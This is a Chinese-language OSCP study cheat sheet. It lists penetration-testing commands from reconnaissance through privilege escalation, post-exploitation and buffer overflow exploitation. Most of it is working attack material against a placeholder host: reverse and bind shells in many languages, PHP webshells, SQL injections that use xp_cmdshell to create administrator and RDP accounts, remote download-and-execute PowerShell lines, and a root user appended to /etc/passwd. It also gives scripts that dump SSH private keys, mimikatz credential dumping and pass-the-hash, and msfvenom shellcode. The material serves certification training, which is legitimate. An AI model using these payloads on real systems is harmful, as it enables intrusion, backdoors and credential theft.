OSCP學習筆記
一、偵查與列舉
1、滲透日志記錄
script target.log
2、埠掃描
(1)Nmap
nmap -sS -Pn -n -A x.x.x.x
不重試掃描所有udp埠
nmap -sU -p- --max-retries 0 --min-rate 500 x.x.x.x
(2)Nc
nc -nvv -w 1 -z x.x.x.x 1-100
(3)PowerShell
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/Invoke-Portscan.ps1');Invoke-Portscan -Hosts x.x.x.x"
3、主機列舉
(1)nikto -h x.x.x.x
(2)enum4linux x.x.x.x
(3)探測主機是32位還是64位
鏈接:
https://github.com/SecureAuthCorp/impacket/blob/master/examples/getArch.py
python getArch.py -target x.x.x.x
4、DNS域名決議
dig axfr domain.com @nameserver
5、Web目錄模糊查詢
(1)Gobuster
apt-get install seclists
gobuster -u x.x.x.x -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 20
gobuster -u x.x.x.x -w /usr/share/seclists/Discovery/Web_Content/quickhits.txt -t 20
gobuster -u x.x.x.x -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 20 -x .txt,.php
(2)Wfuzz
wfuzz -w /usr/share/seclists/Discovery/Web_Content/common.txt --hc 400,404,500 http://x.x.x.x/FUZZ
wfuzz -w /usr/share/seclists/Discovery/Web_Content/quickhits.txt --hc 400,404,500 http://x.x.x.x/FUZZ
6、SMB列舉
smbmap -H x.x.x.x
smbclient -L x.x.x.x
nmap --script=smb-check-vulns.nse x.x.x.x
smbmount //x.x.x.x/share /mnt –o username=xxx,workgroup=xxx
mount -t cifs //x.x.x.x/share /mnt
mount -t cifs -o username=xxx,password=xxx //x.x.x.x/share /mnt
smbclient \\\\x.x.x.x\\share
使用rpcclient的匿名
rpcclient -U "" x.x.x.x
7、SNMP列舉
snmpwalk -c public -v1 x.x.x.x
使用默認字串進行掃描,通過對Kerberos服務強制查詢可能的用戶名來發現有效用戶名
nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='domain.local',userdb=/usr/share/wordlists/SecLists/Usernames/top_shortlist.txt x.x.x.x
https://nmap.org/nsedoc/scripts/krb5-enum-users.html
8、CMS
(1)cmsmap
cmsmap.py https://x.x.x.x
(2)wpscan
wpscan --url https://x.x.x.x
暴力登錄
wpscan --url http://x.x.x.x --wordlist /usr/share/wordlists/SecLists/Passwords/best1050.txt --username admin --threads 10
9、SQL注入
(1)常用方法
1' or '1'='1
1' or '1'='1'
1' or '1'='1'--
' or 1=1 --
a' or 1=1 --
" or 1=1 --
a" or 1=1 --
' or 1=1 #
" or 1=1 #
or 1=1 --
' or 'x'='x
" or "x"="x
') or ('x'='x
") or ("x"="x
(2)使用時間延遲查找可注入引數
';WAITFOR DELAY '0:0:5'--
SLEEP(1) /*‘ or SLEEP(1) or ‘“ or SLEEP(1) or “*/
+BENCHMARK(40000000,SHA1(1337))+
'%2Bbenchmark(3200,SHA1(1))%2B'
(3)如果上述方法生效,嘗試使用xp_cmdshell
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
(4)xp_cmdshell測驗ping
';exec master..xp_cmdshell 'ping -n 3 x.x.x.x'; --
(5)xp_cmdshell添加admin
';exec master..xp_cmdshell 'net user xxx Qwerty123! /ADD && net localgroup administrators xxx /ADD'; --
(6)xp_cmdshell添加admin到RDP組
';exec master..xp_cmdshell 'net user xxx Qwerty123! /ADD && net localgroup administrators xxx /ADD && net localgroup "Remote Desktop Users" xxx /ADD'; --
10、本地檔案包含漏洞(LFI)
(1)基本檢查
linux
../../../../../../../../../../etc/passwd
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
../../../../../../../../../../etc/passwd%00
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%2500
windows
../../../../../../../../../../boot.ini
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini
../../../../../../../../../../boot.ini%00
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%2500
?
../../../../../../../../../../windows/system32/drivers/etc/hosts
../../../../../../../../../../windows/system32/drivers/etc/hosts%00
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/system32/drivers/etc/hosts
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/system32/drivers/etc/hosts%2500
https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI
(2)LFI利用
(1)expect://
http://x.x.x.x/blah?parameter=expect://whoami
(2)data://
http://x.x.x.x/blah?parameter=data://text/plain;base64,PD8gcGhwaW5mbygpOyA/Pg==
# the base64 encoded payload is: <? phpinfo(); ?>
(3)input://
http://x.x.x.x/blah?parameter=php://input
# POST data (using Hackbar)
<? phpinfo(); ?>
11、遠程檔案包含漏洞(RFI)
GET /supersecret/admin.php?path=http://x.x.x.x/phpinfo.php%00
12、檔案與檔案系統
查看靜態系統檔案
cat /etc/fstab
查找可寫目錄
查找可寫檔案
查找可寫組態檔
find /etc/ -writable -type f 2>/dev/null
二、Get Shell
1、Shells
(1)ReverseShells
Bash
bash -i >& /dev/tcp/x.x.x.x/4444 0>&1
/bin/bash -i > /dev/tcp/x.x.x.x/4444 0<&1 2>&1
/bin/sh -i > /dev/tcp/x.x.x.x/4444 0<&1 2>&1
Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Perl
perl -e 'use Socket;$i="x.x.x.x";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Perl Windows
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"x.x.x.x:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
PHP
php -r '$sock=fsockopen("x.x.x.x",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
Ruby
ruby -rsocket -e'f=TCPSocket.open("x.x.x.x",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Netcat
nc -e /bin/sh x.x.x.x 4444
nc -e cmd.exe x.x.x.x 4444
/bin/sh | nc x.x.x.x 4444
rm -f /tmp/p; mknod /tmp/p p && nc x.x.x.x 4444 0/tmp/p
Telnet
rm -f /tmp/p; mknod /tmp/p p && telnet x.x.x.x 4444 0/tmp/p
telnet x.x.x.x 80 | /bin/bash | telnet x.x.x.x 443
Java
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/x.x.x.x/4444;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
Shellshock reverse shell
驗證user-agent header中的漏洞
() { :; }; /bin/bash -c 'whoami'
反彈shell
() { :; }; /bin/bash -c 'bash -i >& /dev/tcp/x.x.x.x/4444 0>&1;'
PowerShell
Invoke-PowerShellTcp
https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
在最下面加
Invoke-PowerShellTcp -Reverse -IPAddress x.x.x.x -Port 4444
C
// gcc reverse.c -o reverse
?
#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <arpa/inet.h>
?
int main (int argc, char **argv)
{
int scktd;
struct sockaddr_in client;
?
client.sin_family = AF_INET;
client.sin_addr.s_addr = inet_addr("x.x.x.x"); // attacker IP
client.sin_port = htons(4444); // attacker port
?
scktd = socket(AF_INET,SOCK_STREAM,0);
connect(scktd,(struct sockaddr *)&client,sizeof(client));
?
dup2(scktd,0); // STDIN
dup2(scktd,1); // STDOUT
dup2(scktd,2); // STDERR
?
execl("/bin/sh","sh","-i",NULL,NULL);
?
return 0;
}
(2)Bind shells
C
// gcc bind.c -o bind
?
#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <arpa/inet.h>
?
int main (int argc, char **argv)
{
int scktd = -1;
int scktd_client = -1;
int i = -1;
struct sockaddr_in server;
struct sockaddr_in client;
scktd = socket(AF_INET,SOCK_STREAM,0);
if (scktd == -1)
return -1;
?
server.sin_family = AF_INET;
server.sin_addr.s_addr = INADDR_ANY;
server.sin_port = htons(4444); // local listening port
?
if(bind(scktd,(struct sockaddr *)&server,sizeof(server)) < 0)
return -2;
?
listen(scktd,3);
i = sizeof(struct sockaddr_in);
scktd_client = accept(scktd,(struct sockaddr *)&client,(socklen_t*)&i);
if (scktd_client < 0)
return -3;
?
dup2(scktd_client,0); // STDIN
dup2(scktd_client,1); // STDOUT
dup2(scktd_client,2); // STDERR
execl("/bin/sh","sh","-i",NULL,NULL);
?
return 0;
}
(3)WebShells
PHP
<1> wordpress
wordpress找到404界面
http://x.x.x.x/404.php?cmd=id
http://x.x.x.x/404.php?cmd=nc x.x.x.x 4444 -e /bin/sh
代碼
<?php echo shell_exec($_GET['cmd']); ?>
<? passthru($_GET["cmd"]); ?>
<?php echo shell_exec($_GET["cmd"]); ?>
<2> phpMyAdmin
<?php system("/usr/local/bin/wget http://x.x.x.x:4444/php-reverse-shell.php -O /var/tmp/hodor.php 2>&1"); ?>
<3> SQL查詢
SELECT "" into outfile "C:\\xampp\\htdocs\\shell.php"
LFI反彈shell
http://x.x.x.x/blah?parameter=/etc/passwd%00
<1> POST request URL
http://x.x.x.x/blah?parameter=php://input%00
<2> POST data
<? phpinfo(); ?>
<3> POST data 通過443埠反彈
<?php echo shell_exec("bash -i >& /dev/tcp/x.x.x.x/443 0>&1 2>&1"); ?>
HTTP 方法
<1> HTTP POST
curl -X POST -F "file=@/location/shell.php" http://x.x.x.x/upload.php --cookie "cookie"
<2> HTTP PUT
curl -X PUT -d '<?php system($_GET["c"]);?>' http://x.x.x.x/shell.php
(4)LOCAL
int main(void){
setresuid(0, 0, 0);
system("/bin/bash");
}
2、檔案傳輸
python檔案傳輸
python -m SimpleHTTPServer (默認埠8000)
python -m SimpleHTTPServer 8001
wget https://gist.githubusercontent.com/UniIsland/3346170/raw/059aca1d510c615df3d9fedafabac4d538ebe352/SimpleHTTPServerWithUpload.py ; chmod +x SimpleHTTPServerWithUpload.py; ./SimpleHTTPServerWithUpload.py
(1)Windows
<1> PowerShell
(New-Object System.Net.WebClient).DownloadFile("http://x.x.x.x:4444/file", "C:\Users\hodor\file")
PS C:\>IEX(New-Object Net.WebClient).downloadString('http://x.x.x.x/Invoke-MS16032.ps1')
遠程代碼下載
C:\Windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX(New-Object Net.WebClient).downloadString('http://x.x.x.x:8000/Invoke-PowerShellTcp.ps1
<2> FTP
方法一:
配置kali ftp
#!/bin/bash
groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pw useradd hodor -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth/
ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/
/etc/init.d/pure-ftpd restart
開啟kali ftp server
# FTP home dir = /ftphome/
/etc/init.d/pure-ftpd start
在目標主機下載nc
echo open x.x.x.x 21> test.txt
echo USER hodor>> test.txt
echo hodor>> test.txt
echo bin >> test.txt
echo GET nc.exe >> test.txt
echo bye >> test.txt
ftp -v -n -s:test.txt
方法二
apt-get install python-pyftpdlib
python -m pyftpdlib -p 21
ftp x.x.x.x
get nc.exe
nc.exe -nv x.x.x.x 4444 -e cmd.exe
C:\Inetpub\wwwroot\nc.exe -e cmd.exe x.x.x.x 4444
<3> rdp
通過本地共享
rdesktop x.x.x.x -r disk:share=/home/user/foldertoshare
<4> VBScript
代碼
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
執行
cscript wget.vbs http://x.x.x.x/file.exe file.exe
(2)Linux
<1> Wget
wget http://x.x.x.x/blah.txt
wget http://x.x.x.x/blah.txt -O blah.txt
<2> Netcat
目標機
nc -lvp 4444 > blah.txt
本機
方法一
nc x.x.x.x 4444 < blah.txt
方法二
cat blah.txt | nc x.x.x.x 4444
<3> Python
python -c "import urllib; print urllib.urlopen('http://x.x.x.x:8000/ms11-080.py').read()" > ms11-080.py
三、提權
1、Windows
(1)Windows 版本
<1> 客戶端
<2> 服務端
(2)Users
查看當前用戶
whoami
echo %username%
我們有哪些用戶權限
whoami /priv
用戶有哪些
net users
看是否有管理員權限
net localgroup administrators
憑證管理
cmdkey /list
當前快取的Kerberos票證(可能還有其他網路組件的一些資訊)
klist
是否有其他已登錄用戶
qwinsta
(3)Password
password hashes
/usr/share/windows-binaries/fgdump/fgdump.exe
C:\> fgdump.exe
C:\> type 127.0.0.1.pwdump
fgdump鏈接
FGDump - aldeid
如果是域控制,請在groups.xml中搜索“cpassword”:
findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml
(4)查找密碼
dir /s *password*
findstr /si password *.ini *.xml *.txt
findstr /spin "password" *.*
一些常見的檔案
type c:\sysprep.inf
type c:\sysprep\sysprep.xml
type c:\unattend.xml
type %WINDIR%\Panther\Unattend\Unattended.xml
type %WINDIR%\Panther\Unattended.xml
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul
?
dir c:*vnc.ini /s /b
dir c:*ultravnc.ini /s /b
dir c:\ /s /b | findstr /si *vnc.ini
%windir%\repair\sam
%windir%\System32\config\RegBack\SAM
%windir%\repair\system
%windir%\repair\software
%windir%\repair\security
%windir%\debug\NetSetup.log (AD domain name, DC name, internal IP, DA account)
%windir%\iis6.log (5,6 or 7)
%windir%\system32\logfiles\httperr\httperr1.log
C:\sysprep.inf
C:\sysprep\sysprep.inf
C:\sysprep\sysprep.xml
%windir%\Panther\Unattended.xml
C:\inetpub\wwwroot\Web.config
%windir%\system32\config\AppEvent.Evt (Application log)
%windir%\system32\config\SecEvent.Evt (Security log)
%windir%\system32\config\default.sav
%windir%\system32\config\security.sav
%windir%\system32\config\software.sav
%windir%\system32\config\system.sav
%windir%\system32\inetsrv\config\applicationHost.config
%windir%\system32\inetsrv\config\schema\ASPNET_schema.xml
%windir%\System32\drivers\etc\hosts (dns entries)
%windir%\System32\drivers\etc\networks (network settings)
%windir%\system32\config\SAM (only really useful if you have access to the files while the machine is off)
(5)始終保持高位
檢查一下注冊表值是否為1
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
如果是1,則執行惡意msi添加本地用戶
msfvenom -p windows/adduser USER=hodor PASS=Qwerty123! -f msi -o hodor.msi
msiexec /quiet /qn /i C:\hodor.msi
(6)upnp
sc qc upnphost
sc config upnphost binpath= "C:\nc.exe -nv x.x.x.x -e C:\WINDOWS\System32\cmd.exe"
sc config upnphost obj= ".\LocalSystem" password= ""
sc qc upnphost
net start upnphost
缺少依賴項時出錯?
sc config SSDPSRV start= auto
net start SSDPSRV
net start upnphost
或者直接移除依賴
sc config upnphost depend= ""
(7)計劃任務
列出計劃任務
schtasks /query /fo LIST /v
運行鏈接到服務的行程
tasklist /SVC
(8)PowerShell 工具
<1> PowerUp.ps1
檢查公共視窗載體
PowerTools/PowerUp.ps1 at master · PowerShellEmpire/PowerTools · GitHub
在目標機下載
IEX(New-Object Net.Webclient).downloadString('http://x.x.x.x:8000/PowerUp.ps1')
在腳本底部增加
Invoke-AllChecks
運行
powershell.exe -nop -exec bypass
PS C:\> Import-Module .\PowerUp.ps1
PS C:\> Invoke-AllChecks
<2> Sherlock.ps1
Sherlock/Sherlock.ps1 at master · rasta-mouse/Sherlock · GitHub
IEX(New-Object Net.Webclient).downloadString('http://x.x.x.x:8000/Sherlock.ps1')
在腳本底部增加
Find-AllVulns
運行
powershell.exe -nop -exec bypass
PS C:\> Import-Module .\Sherlock.ps1
PS C:\> Find-AllVulns
<3> Nishang
GitHub - samratashok/nishang: Nishang - Offensive PowerShell for red team, penetration testing and offensive security.
(9)編譯
在linux上編譯exe
i686-w64-mingw32-gcc 18176.c -lws2_32 -o 18176.exe
編譯python腳本為可執行檔案
wine ~/.wine/drive_c/Python27/Scripts/pyinstaller.exe --onefile exploit.py
(10)windows漏洞
<1> 遠程漏洞
ms03-026
ms03-039 (1)
ms03-039 (2)
ms03-049
ms04-007
ms04-011 - ssl bof
ms04-011 - lsasarv.dll
ms04-031
ms05-017
ms05-039
ms06-040 (1)
ms06-040 (2)
ms06-070
ms08-067 (1)
ms08-067 (2)
ms08-067 (3)
ms09-050
<2> 本地漏洞
ms04-011
ms04-019 (1)
ms04-019 (2)
ms04-019 (3)
ms04-020
keybd_event
ms05-018
ms05-055
ms06-030
ms06-049
print spool service
ms08-025
netdde
ms10-015
ms10-059
ms10-092
ms11-080
ms14-040
ms14-058 (1)
ms14-058 (2)
ms14-070 (1)
ms14-070 (2)
ms15-010 (1)
ms15-010 (2)
ms15-051
ms16-014
ms16-016
ms16-032
鏈接:
Exploit Database - Exploits for Penetration Testers, Researchers, and Ethical Hackers
GitHub - abatchy17/WindowsExploits: Windows exploits, mostly precompiled. Not being updated. Check https://github.com/SecWiki/windows-kernel-exploits instead.
https://github.com/SecWiki/windows-kernel-exploits
2、Linux
(1)Sudo
cat /etc/sudoers
sudo -l
成為超級英雄:
root可以從所有終端執行,充當所有(任何)用戶,并運行所有(任何)命令,
root ALL=(ALL) ALL
用戶john可以從任何終端使用john的用戶密碼運行命令power off
john ALL= /sbin/poweroff
用戶john可以從任何終端以root用戶身份運行命令scp,無需密碼,
john ALL = (root) NOPASSWD: /usr/bin/scp
(2)分發型別和內核版本
cat /etc/*release*
uname -a
rpm -q kernel
dmesg | grep -i linux
(3)默認可寫目錄/檔案夾
/tmp
/dev/shm
(4)查找密碼
在config.php中搜索密碼
grep -R 'password' config.php
在整個系統里面查詢密碼
find / -type f -exec grep -H 'password' {} \; 2>/dev/null
grep -R -i "password" 2> >(grep -v 'Permission denied' >&2)
grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password"
(5)查找可能的其他可寫目錄/檔案夾
(6)root正在運行的服務
ps aux | grep root
ps -ef | grep root
(7)已安裝app
ls -lah /usr/bin/
ls -lah /sbin/
dpkg -l
rpm -qa
ls -lah /var/cache/apt/archivesO
ls -lah /var/cache/yum/
(8)計劃作業
crontab -l
ls -la /etc/cron*
ls -lah /var/spool/cron
ls -la /etc/ | grep cron
cat /etc/crontab
cat /etc/anacrontab
(9)其他方法
<1> 在檔案中查找
grep -rnw '/etc/passwd' -e 'root'
<2> SSH
authorized_keys:
包含任何授權客戶端的公鑰簽名,換句話說,指定可用于登錄到為其組態檔的用戶帳戶的SSH密鑰,此檔案允許服務器對用戶進行身份驗證,
id_rsa
包含客戶端的私鑰,此RSA密鑰可與SSH協議1或2一起使用,
id_rsa.pub
包含客戶端的公鑰
id_dsa
包含客戶端的私鑰,此(不安全)DSA密鑰只能與SSH協議2一起使用,
id_dsa.pub
包含客戶端的公鑰
known_hosts
包含客戶端曾經連接到的主機的主機簽名串列,
<3> 查找RSA私鑰
#!/bin/bash
for X in $(cut -f6 -d ':' /etc/passwd |sort |uniq); do
if [ -s "${X}/.ssh/id_rsa" ]; then
echo "### ${X}: "
cat "${X}/.ssh/id_rsa"
echo ""
fi
done
<4> 查找DSA私鑰
#!/bin/bash
for X in $(cut -f6 -d ':' /etc/passwd |sort |uniq); do
if [ -s "${X}/.ssh/id_dsa" ]; then
echo "### ${X}: "
cat "${X}/.ssh/id_dsa"
echo ""
fi
done
<5> 查找bit, SGID, SUID, GUID
bit :
find / -perm -1000 -type d 2>/dev/null
SGID (chmod 2000):
find / -perm -g=s -type f 2>/dev/null
SUID (chmod 4000) :
find / -perm -u=s -type f 2>/dev/null
find /* -user root -perm -4000 -print 2>/dev/null
SUID or GUID
find / -perm -g=s -o -perm -u=s -type f 2>/dev/null
(10)向/etc/passwd增加用戶,所屬組為root
echo hodor::0:0:root:/root:/bin/bash >> /etc/passwd
(11)列舉工具
Linenum.sh
https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
LinPrivChecker.py
linpostexp/linprivchecker.py at master · reider-roque/linpostexp · GitHub
(12)Linux本地漏洞
kernel 2.4.x / 2.6.x (sock_sendpage 1)
kernel 2.4 / 2.6 (sock_sendpage 2)
kernel < 2.6.22 (ftruncate)
kernel < 2.6.34 (cap_sys_admin)
kernel 2.6.27 < 2.6.36 (compat)
kernel < 2.6.36-rc1 (can bcm)
kernel <= 2.6.36-rc8 (rds protocol)
kernel < 2.6.36.2 (half nelson)
kernel <= 2.6.37 (full nelson)
kernel 2.6 (udev)
kernel 3.13 (sgid)
kernel 3.13.0 < 3.19 (overlayfs 1)
kernel 3.14.5 (libfutex)
kernel 2.6.39 <= 3.2.2 (mempodipper)
*kernel 2.6.28 / 3.0 (alpha-omega)
kernel 2.6.22 < 3.9 (Dirty Cow)
kernel 3.7.6 (msr)
*kernel < 3.8.9 (perf_swevent_init)
kernel <= 4.3.3 (overlayfs 2)
kernel 4.3.3 (overlayfs 3)
kernel 4.4.0 (af_packet)
kernel 4.4.x (double-fdput)
kernel 4.4.0-21 (netfilter)
kernel 4.4.1 (refcount)
(13)預編譯漏洞
https://github.com/SecWiki/linux-kernel-exploits
https://github.com/xairy/linux-kernel-exploitation
四、后滲透
1、Proof.txt
(1)Linux
cat /root/proof.txt
(2)Windows
type "C:\Documents and Settings\Administrator\Desktop\proof.txt"
2、Windows
(1)增加RDP用戶
net user hodor Qwerty123! /add
net localgroup administrators hodor /add
net localgroup "Remote Desktop Users" hodor /add
(2)啟用RDP
通過注冊表
reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
添加防火墻策略
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable
(3)RDP連接
rdesktop -g 1024x768 x.x.x.x
(4)密碼與哈希
從lsass記憶體中提取密碼、密鑰、pin碼、票據
privilege::debug
log sekurlsa.log
sekurlsa::logonpasswords
Pass-the-hash
privilege::debug
log sekurlsa.log
sekurlsa::sekurlsa::pth /user:Administrator /domain:acme /ntlm:893efccda23744616cf7accab23ascbb /run:cmd
Elevate token
privilege::debug
log sekurlsa.log
token::elevate
Dump SAM
privilege::debug
log sekurlsa.log
lsadump::sam
Windows憑據編輯器(WCE):
安全工具,可用于從Windows主機中提取明文密碼和NTLM散列,需要管理員權限
Amplia Security - Research - Windows Credentials Editor (WCE)
C:\> wce -w
(5)網路
查看網路連接
netstat -ano
Host檔案
C:\WINDOWS\System32\drivers\etc\hosts
防火墻組態檔
netsh firewall show state
netsh firewall show config
netsh dump
(6)PowerShell 工具
Empire
https://github.com/EmpireProject/Empire
PowerSploit
https://github.com/PowerShellMafia/PowerSploit
2、Linux
切換TTY shell
python -c 'import pty; pty.spawn("/bin/sh")'
echo os.system('/bin/bash')
/bin/bash -i
/bin/sh -i
perl -e 'exec "/bin/sh";'
五、橫向移動
1、本地埠轉發
本地埠轉發到遠程埠
ssh <gateway> -L <local port to listen>:<remote host>:<remote port>
2、遠程埠轉發
轉發遠程埠到本地埠
ssh <gateway> -R <remote port to bind>:<local host>:<local port>
Windows:轉發本地445埠到kali444埠
首先在kali上啟動ssh
service ssh start
下載plink.exe然后執行
plink.exe -l root x.x.x.x -R 444:127.0.0.1:445
3、動態埠轉發
-D 使SSH充當SOCKS(4,5)代理服務器,這只是一個SSH隧道,在該隧道中,特定應用程式通過隧道將流量轉發到遠程服務器,與本地埠轉發不同,動態埠轉發可以處理來自多個埠的連接,
ssh -D <local proxy port> -p <remote port> <target>
六、緩沖區溢位
1、基礎知識
x86體系結構包含8個通用暫存器,用于存盤資料,然后可以將該點尋址到記憶體中的其他位置
EBP(基礎指標)
ESP(堆疊指標)
EAX(累加器)
EBX(基底器)
ECX(計數器)
EDX(資料)
EDI(目標地址)
ESI(源地址)
EIP:擴展指令指標,這是一個只讀暫存器,包含下一條要執行的指令的地址(告訴CPU下一步要做什么)
ESP:擴展堆疊指標,指向位于較低記憶體位置的堆疊頂部(隨時)
EBP:擴展的基本堆疊指標,指向堆疊底部的更高地址(最后一項)
2、壞字符
0x00 NULL (\0)
0x09 Tab (\t)
0x0a Line Feed (\n)
0x0d Carriage Return (\r)
0xff Form Feed (\f)
bash中生成壞字串列
for i in {1..255}; do printf "\\\x%02x" $i; done; echo -e "\r"
python中生成壞字串列
'\\'.join([ "x{:02x}".format(i) for i in range(1,256) ])
3、Windows
常規步驟
(1)模糊直至崩潰,注意EIP被A's (x41)覆寫,
(2)使用pattern_create.rb生成唯一字串并將其發送到目標
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2700
(3)識別覆寫EIP的4個位元組(以十六進制表示)
(4)使用pattern_offset.rb計算這些特定4位元組的偏移量
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 2700 -q 39694438
(5)發送新的緩沖區字串以檢查我們是否可以控制EIP暫存器,因為它應該用B's寫,添加到漏洞并注意ESP和EIP暫存器的結果
buffer = "A" * 2606 + "B" * 4 + "C" * 90
(6)檢查緩沖區內是否有更多可用空間(將緩沖區長度從2700位元組增加到3500位元組,并查看這是否會導致代碼的緩沖區空間更大),啟動morespace.py->右鍵單擊ESP->跟蹤轉儲,添加到漏洞并檢查C's
buffer = "A" * 2606 + "B" * 4 + "C" * (3500 – 2606 - 4)
(7)檢查壞字符(0x00到0xff),將所有這些字符粘貼到緩沖區中,并檢查ESP暫存器轉儲被截斷的位置,右鍵單擊ESP并在轉儲中跟隨以查看
(8)如果我們不能直接跳轉到我們的緩沖區,我們需要在記憶體中找到一個可靠的地址,其中包含一條指令,如JMP ESP,我們可以跳轉到它,然后在跳轉時,跳轉到ESP暫存器指向的地址,這將是一種可靠的間接方式來訪問ESP暫存器指示的記憶體,mona.py可以幫助識別記憶體中可以搜索回傳地址的模塊(不應存在DEP和ASLR,并且高記憶體范圍不包含壞字符)
!mona modules
檢查是否受任何記憶體保護方案(Rebase、SafeSEH、ASLR、NXCompat)的影響,并注意特定的DLL(右欄),
(9) JMP ESP equivalent = opcode
/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
nasm > jmp esp
00000000 FFE4 jmp esp
結果為"\xff\xe4"
(10)使用mona在步驟8中找到的DLL中查找JMP ESP記憶體地址,使用一個不包含任何壞字符的,
!mona find -s "\xff\xe4" -m <dllname>.dll
(11)暫停除錯器并按照地址(指向右側的黑色箭頭:“要遵循的運算式”),注意是否找到JMP ESP(左上方的窗格)
(12)設定一個斷點來檢查我們是否可以到達JMP ESP,
左上窗格->右鍵單擊->轉到運算式
左上窗格->右鍵單擊->斷點->切換(F2)
使用并執行以下操作
添加到PoC(記憶體地址是我們在步驟10中找到的地址,注意Little Endian)
buffer = "A" * 2606 + "\x8f\x35\x4a\x5f" + "C" * 390
運行PoC并檢查是否命中了斷點(除錯器底部的訊息),
(13)生成反彈shell
msfvenom -p windows/shell_reverse_tcp LHOST=x.x.x.x LPORT=443 -f c –e x86/shikata_ga_nai -b "\x00\x0a\x0d"
(14)添加shellcode到腳本
buffer="A"*2606 + "\x8f\x35\x4a\x5f" + "\x90" * 8 + shellcode
如果需要可以增加NOP
案例
FuzzySecurity | ExploitDev: Part 2
Exploiting Simple Buffer Overflows on Win32
GitHub - justinsteven/dostackbufferoverflowgood
buffer-overflow/win-buff-overflow at master · SiowCY/buffer-overflow · GitHub
七、其他
1、kali自帶反彈shell
/usr/share/webshells/php/php-reverse-shell.php
/usr/share/webshells/php/simple-backdoor.php
2、Msfvenom
(1)查看所有payload
msfvenom -l payloads
(2)監聽
msfconsole
use exploit/multi/handler
set lhost x.x.x.x
set lport 4444
exploit
(3)Windows
msfvenom -p windows/shell_reverse_tcp LHOST=x.x.x.x LPORT=4444 EXITFUNC=thread -b "\x00" -f python -v shellcode
